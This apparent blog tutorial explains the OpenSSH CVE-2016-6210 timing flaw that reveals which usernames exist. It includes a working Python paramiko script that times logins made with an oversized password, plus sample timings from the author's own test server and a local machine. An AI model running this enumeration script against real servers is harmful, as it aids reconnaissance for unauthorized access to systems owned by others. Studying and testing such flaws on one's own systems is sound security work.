Listing users via the CVE-2016-6210 vulerability
So when OpenSSH checks a user’s password, it will use a hashing function like SHA256 / SHA512 to hash the password and check it against the user’s saved hashed password.
However, OpenSSH 7.2p2 and before had a vulerability where it would use Blowfish for users that don’t exist, and SHA256 / SHA512 for real users. The two hashes compute data at different speeds, so it’s easy to tell a real one from a fake one. This bug shows some other info for it.
If SELinux is enabled, OpenSSH will use the helper binary “unix_chkpwd” which mitigates this flaw.
Test Script
Here is a python script from this article. Setting the <SET SERVER HERE> to whatever server we want to test, we can see if the server is vulerable:
import paramiko
import time
user=raw_input("user: ")
p='A'*25000
ssh = paramiko.SSHClient()
starttime=time.time()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect('<SET SERVER HERE>', username=user,
password=p)
except:
endtime=time.time()
total=endtime-starttime
print(total)
Testing it
So, first let’s test a remote server of mine that I setup just for this. I change the above ‘
Let’s test a real user (you can also user root as the user, if it’s enabled):
user: realuser
12.5089271069
Then let’s test a fake one:
user: iambatman
2.69300603867
As you can see, 12.5 is greater than 2.6, so yes the server is vulerable.
In other cases, this can be done on a local system.
Fake user:
nothere
0.0369758605957
Real user:
MrReal
0.0134921073914
As you can see, the times are still different, but the real one is less than the fake one. I’m guessing this is due to SHA256/512 being faster than Blowfish, and the checker not adding any wait time as it’s a local connection.